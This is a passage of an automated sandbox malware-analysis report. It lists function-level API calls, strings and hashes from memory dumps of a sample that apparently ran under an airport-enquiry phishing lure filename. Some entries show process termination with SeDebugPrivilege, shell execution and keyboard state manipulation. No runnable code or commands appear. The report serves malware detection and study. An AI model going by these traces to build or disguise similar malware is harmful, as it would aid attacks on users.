            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
            • String ID: NULL Pointer assignment
            • API String ID: 1300414916-2785691316
            • Opcode ID: 711747a0b567a7c3e7ce063249c3ce5d46c9d89f2df6bec5b7844feb34a3ec21
            • Instruction ID: 6b3cfc5227cf0485efa43b208e2495f480bfd2810e8a4fd43b8496fd82d0ecb0
            • Opcode Fuzzy Hash: 711747a0b567a7c3e7ce063249c3ce5d46c9d89f2df6bec5b7844feb34a3ec21
            • Instruction Fuzzy Hash: 3B914971D0021DABDF10DFA5DC84AEEBBB9EF08710F20415AF519A7281EB719A44DFA1
            APIs
            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D07093
            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00D070A7
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D070C1
            • _wcscat.LIBCMT ref: 00D0711C
            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D07133
            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D07161
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Window_wcscat
            • String ID: SysListView32
            • API String ID: 307300125-78025650
            • Opcode ID: 67e06a88175ed86eb216febc3b6f7d91a6dd3aaaa56056c2bf1fa61c934df0a1
            • Instruction ID: d1f5066072658be069f2b1dd23c92b3ae7069f0ba8d417bb2d18aa752faebc18
            • Opcode Fuzzy Hash: 67e06a88175ed86eb216febc3b6f7d91a6dd3aaaa56056c2bf1fa61c934df0a1
            • Instruction Fuzzy Hash: 6B418471A04308AFDB219F64CC85BEE77B8EF08354F14452AF589EB2D1D672AD858B70
            APIs
              • Part of subcall function 00CE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00CE3EB6
              • Part of subcall function 00CE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00CE3EC4
              • Part of subcall function 00CE3E91: CloseHandle.KERNEL32(00000000), ref: 00CE3F8E
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFECB8
            • GetLastError.KERNEL32 ref: 00CFECCB
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFECFA
            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CFED77
            • GetLastError.KERNEL32(00000000), ref: 00CFED82
            • CloseHandle.KERNEL32(00000000), ref: 00CFEDB7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
            • String ID: SeDebugPrivilege
            • API String ID: 2533919879-2896544425
            • Opcode ID: 65932b507127ce7a73aa08723a11b00cd421a19f18b123a31755b01cd68c520b
            • Instruction ID: 863e2b796a56f0120959bbd02335b6b7f36b37ed73935caca266576faf403525
            • Opcode Fuzzy Hash: 65932b507127ce7a73aa08723a11b00cd421a19f18b123a31755b01cd68c520b
            • Instruction Fuzzy Hash: 1C41BB712002049FDB24EF24CC95F7EB7A1AF80714F18805DFA469B3D2DBB5A904EB96
            APIs
            • LoadIconW.USER32(00000000,00007F03), ref: 00CE32C5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconLoad
            • String ID: blank$info$question$stop$warning
            • API String ID: 2457776203-404129466
            • Opcode ID: 1f404e3efcea49740b96c1f86d88d98d6f1cdde7be00b0d8c0d3eb1708cbaef6
            • Instruction ID: fb83986dc3b92c4873478a4cd687f7ba118f2a04735f958078c00908b36f0538
            • Opcode Fuzzy Hash: 1f404e3efcea49740b96c1f86d88d98d6f1cdde7be00b0d8c0d3eb1708cbaef6
            • Instruction Fuzzy Hash: 2711F3317083C6BAA7015B57DC56D6AB39CDF1A364F20002AFA50AB2C2E6A5AB4045B5
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CE454E
            • LoadStringW.USER32(00000000), ref: 00CE4555
            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CE456B
            • LoadStringW.USER32(00000000), ref: 00CE4572
            • _wprintf.LIBCMT ref: 00CE4598
            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CE45B6
            Strings
            • %s (%d) : ==> %s: %s %s, xrefs: 00CE4593
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HandleLoadModuleString$Message_wprintf
            • String ID: %s (%d) : ==> %s: %s %s
            • API String ID: 3648134473-3128320259
            • Opcode ID: a164383288d7c1a0dae4594c5cd862af88f8c3f3a5f608a02f43867f1da55b06
            • Instruction ID: 4b909c224af200ac236aee112e21744b56d459ebff1ae24d04ced151b5bd6b4d
            • Opcode Fuzzy Hash: a164383288d7c1a0dae4594c5cd862af88f8c3f3a5f608a02f43867f1da55b06
            • Instruction Fuzzy Hash: C8014FF2900308BFE720E7A19D89FEB776CE708301F5005A5BB49E2151EA759E858B71
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • GetSystemMetrics.USER32(0000000F), ref: 00D0D78A
            • GetSystemMetrics.USER32(0000000F), ref: 00D0D7AA
            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00D0D9E5
            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D0DA03
            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D0DA24
            • ShowWindow.USER32(00000003,00000000), ref: 00D0DA43
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D0DA68
            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00D0DA8B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
            • String ID:
            • API String ID: 1211466189-0
            • Opcode ID: 7c7550433a597f8485e1a31a5f75299f50c38d97bbad7825d975e14e4ba484f4
            • Instruction ID: 5996f830446c0c1c0eefc19d426133eae32e5fe2c4761bac20500891db8adc8a
            • Opcode Fuzzy Hash: 7c7550433a597f8485e1a31a5f75299f50c38d97bbad7825d975e14e4ba484f4
            • Instruction Fuzzy Hash: CAB18A75600225EFDF14CFA8C9857BE7BB2FF48711F08816AEC499B295D734A950CBA0
            APIs
            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000), ref: 00C82ACF
            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00C82B17
            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000), ref: 00CBC46A
            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000), ref: 00CBC4D6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ShowWindow
            • String ID:
            • API String ID: 1268545403-0
            • Opcode ID: 73af77dddbdfb558ae9f845183098f25fa860dc4c823435ea8790eff579036e6
            • Instruction ID: d79e3a925cebe2060e4ff43e120d984dabf4353658742656bf731da3c026115d
            • Opcode Fuzzy Hash: 73af77dddbdfb558ae9f845183098f25fa860dc4c823435ea8790eff579036e6
            • Instruction Fuzzy Hash: F4412C352047809BC73DAB29CCDC7FB7B92AF96308F64841DE06787660C6359A41F729
            APIs
            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CE737F
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CE73B6
            • EnterCriticalSection.KERNEL32(?), ref: 00CE73D2
            • _memmove.LIBCMT ref: 00CE7420
            • _memmove.LIBCMT ref: 00CE743D
            • LeaveCriticalSection.KERNEL32(?), ref: 00CE744C
            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CE7461
            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE7480
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
            • String ID:
            • API String ID: 256516436-0
            • Opcode ID: 9611a01ba71358ee2f2e22b3fb7b7c7442e188eb78bfd374d318da0ffc0d02e9
            • Instruction ID: fd8b59398afc5c43ffdf9065c2f4031fdc4abbcddb78962624983b5042db1b5c
            • Opcode Fuzzy Hash: 9611a01ba71358ee2f2e22b3fb7b7c7442e188eb78bfd374d318da0ffc0d02e9
            • Instruction Fuzzy Hash: CE318F35904205EBCF10EFA5DC85AAE7B78EF45710F2441A9FD04EB256DB709E10DBA4
            APIs
            • DeleteObject.GDI32(00000000), ref: 00D0645A
            • GetDC.USER32(00000000), ref: 00D06462
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D0646D
            • ReleaseDC.USER32(00000000,00000000), ref: 00D06479
            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D064B5
            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D064C6
            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00D06500
            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D06520
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
            • String ID:
            • API String ID: 3864802216-0
            • Opcode ID: 09bf7a0282aadd8070fcd90afb2ec28a6939cb74794ac56eab31559ecaff6a31
            • Instruction ID: c1185ee9dd734b144e6fc62b408f45d5e82883c921dcd4a6456c41e2ff4e7763
            • Opcode Fuzzy Hash: 09bf7a0282aadd8070fcd90afb2ec28a6939cb74794ac56eab31559ecaff6a31
            • Instruction Fuzzy Hash: D6316B72201214BFEB218F50DC8AFEA3FA9EF09761F084065FE0CDA295D6759851CBB4
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: 041904e6f2a5944d688040bdfe1a5f008dee1d398823eabf645b4c1a4bab003d
            • Instruction ID: 67c28d38090a8f8d02bea38c404e7a49d2499e803caaf2a07f60c4794b7f0571
            • Opcode Fuzzy Hash: 041904e6f2a5944d688040bdfe1a5f008dee1d398823eabf645b4c1a4bab003d
            • Instruction Fuzzy Hash: 67218371641217BB9714A521ADC2FBF236DEF21398F084022FF0596382EB52EE25D2E5
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
            • _wcstok.LIBCMT ref: 00CEEEFF
            • _wcscpy.LIBCMT ref: 00CEEF8E
            • _memset.LIBCMT ref: 00CEEFC1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
            • String ID: X
            • API String ID: 774024439-3081909835
            • Opcode ID: 77ef351c3cd453a0431f7fc88dcc5cc6d67c8e0742fffd971d065786c2ea4151
            • Instruction ID: 0588235e3cca9ac75abe85ec1f55bc3c70d75624c106411e2a3de04f6f42ad9a
            • Opcode Fuzzy Hash: 77ef351c3cd453a0431f7fc88dcc5cc6d67c8e0742fffd971d065786c2ea4151
            • Instruction Fuzzy Hash: A8C1A0315083419FC724EF24C881AAEB7E4FF85318F14492DF89A972A2DB70ED45DB86
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09a16364aa1d83ea0763703efda121693595c5e9657b0fd5f373b02bf9632028
            • Instruction ID: 961304c933d65ebc192cb9ac744b2e8cd11267b2262e7d7af32574507649791b
            • Opcode Fuzzy Hash: 09a16364aa1d83ea0763703efda121693595c5e9657b0fd5f373b02bf9632028
            • Instruction Fuzzy Hash: 4D717E30900109FFCB14DF99CC49ABEBBB9FF85314F288159F915AA251C730AA52CFA4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1597b6ff01cbd5d86b46cc45beeeeaf24122072abab4c11689f1235d7d437875
            • Instruction ID: 03be7196e9da76be881a6c20e8a00b4f806d692b350d1921f03523907a5872d4
            • Opcode Fuzzy Hash: 1597b6ff01cbd5d86b46cc45beeeeaf24122072abab4c11689f1235d7d437875
            • Instruction Fuzzy Hash: 5D61AB71508304ABC720EB24CC85F7FB7E9EF84718F144A19F656972A2DB70AE04D792
            APIs
            • IsWindow.USER32(01655828), ref: 00D0B6A5
            • IsWindowEnabled.USER32(01655828), ref: 00D0B6B1
            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00D0B795
            • SendMessageW.USER32(01655828,000000B0,?,?), ref: 00D0B7CC
            • IsDlgButtonChecked.USER32(?,?), ref: 00D0B809
            • GetWindowLongW.USER32(01655828,000000EC), ref: 00D0B82B
            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D0B843
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
            • String ID:
            • API String ID: 4072528602-0
            • Opcode ID: 7032a210a250a43a15a2e130b3f892714dd2318dd1a52ab810947dde15fbc8ad
            • Instruction ID: a2ad5553cf98b7d973527f516bc6c64e485c43d1530458b2b4a6e6247c1fab78
            • Opcode Fuzzy Hash: 7032a210a250a43a15a2e130b3f892714dd2318dd1a52ab810947dde15fbc8ad
            • Instruction Fuzzy Hash: E5719334608304AFDB20DF54C894FAA77B9EF89320F58445AE94A973E1C772AC41DB74
            APIs
            • _memset.LIBCMT ref: 00CFF75C
            • _memset.LIBCMT ref: 00CFF825
            • ShellExecuteExW.SHELL32(?), ref: 00CFF86A
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
            • GetProcessId.KERNEL32(00000000), ref: 00CFF8E1
            • CloseHandle.KERNEL32(00000000), ref: 00CFF910
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
            • String ID: @
            • API String ID: 3522835683-2766056989
            • Opcode ID: c99ec98eb7b8a75b15cf5d9c725944ec84c2d0481fb20861cfb95cbc08fcb1a6
            • Instruction ID: e9c5886ff92fd4883d473e26f28d523cb3cf63dd60034c7ddea265a1ff6d1f09
            • Opcode Fuzzy Hash: c99ec98eb7b8a75b15cf5d9c725944ec84c2d0481fb20861cfb95cbc08fcb1a6
            • Instruction Fuzzy Hash: 3B61AE75A006199FCF14EF54C4809AEBBF0FF49314F15806DE95AAB391CB30AE42DB95
            APIs
            • GetParent.USER32(?), ref: 00CE149C
            • GetKeyboardState.USER32(?), ref: 00CE14B1
            • SetKeyboardState.USER32(?), ref: 00CE1512
            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CE1540
            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CE155F
            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CE15A5
            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CE15C8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 4af33848fea8c2ac3f349205dbd5ae885e61dc3fc6135c20e67ffb0dd615e570
            • Instruction ID: c335a577e13bc6678d9db9ff82011e6cad18c3f4c8559faa680f451ab6f80d91
            • Opcode Fuzzy Hash: 4af33848fea8c2ac3f349205dbd5ae885e61dc3fc6135c20e67ffb0dd615e570
            • Instruction Fuzzy Hash: A051E3B06047D53DFB3242268C45BBABEE96B46304F0C4489F9E6458C2C2E89EA4D750
            APIs
            • GetParent.USER32(00000000), ref: 00CE12B5
            • GetKeyboardState.USER32(?), ref: 00CE12CA
            • SetKeyboardState.USER32(?), ref: 00CE132B
            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CE1357
            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CE1374
            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CE13B8
            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CE13D9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 7504bfff591b91e05fbda7dceb16880740dfbc8a6bf076e6c35db6dccdd20f65
            • Instruction ID: 76fd3bc7333d2b229f617d054d4154a6526e030026cf0ed54d4cae56f17af9bc
            • Opcode Fuzzy Hash: 7504bfff591b91e05fbda7dceb16880740dfbc8a6bf076e6c35db6dccdd20f65
            • Instruction Fuzzy Hash: 8951E7B05047D53DFB3287268C45BBA7FA95F06300F0C4589E9E446DD2D3A5EEA4E760
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
